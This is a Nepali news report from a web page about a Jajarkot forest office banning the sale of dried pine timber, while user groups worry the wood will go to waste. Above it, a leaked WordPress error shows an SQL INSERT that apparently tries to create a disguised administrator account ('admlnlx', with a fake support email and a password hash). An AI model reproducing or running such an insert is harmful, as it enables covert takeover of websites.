WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bxk55L4UwQ9EPv5m1xw1dwGwUF1YGY/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:25:22', '', 'admlnlx', 'admlnlx')
जाजरकोट, फागुन २-
यहाँको जिल्ला वन कार्यालयले सुकेका सल्लीका रुख काट्न रोक लगाएपछि काठ खेर जाने सम्भावना बढेको छ ।
विभिन्न खोटो कम्पनीहरुले जथाभावी खोटो निकालेपछि सल्लीका रुख सुकेका थिए । सुकेका रुखहरु विभिन्न वन समूहले कुहिन र जल्नबाट जोगाउन सुकेको काठ बिक्री गर्ने तयारी गरेका बेला जिल्ला वन कार्यालयले बिक्री वितरणमा रोक लगाएको हो । वन कार्यालयले सुकेका काठ बिक्री वितरणमा रोक लगाएसँगै यहाँका वन समूहहरु काठ खेर जाने हो कि भनेर चिन्तित भएको बताएका छन् । जिल्लाका सिमा, जुगाथापाचौर, कार्कीगाउँलगायतका आधा दर्जन गाविसमा सुकेका सल्लीका काठ काट्न वन कार्यालयले प्रतिबन्ध लगाएको हो ।
सुकेका काठ लिनका लागि विभिन्न काष्ठ उद्योगले वन समूहसँग सम्झौता गर्न तयार भएका बेला काठ बिक्री वितरणमा प्रतिबन्ध लगाएपछि समस्या भएको छ । सुकेर ढलेका, काठ सदुपयोग नगर्ने हो भने कुहिएर खेर जाने भन्दै वन समूह चिन्तित भएका छन् ।- रासस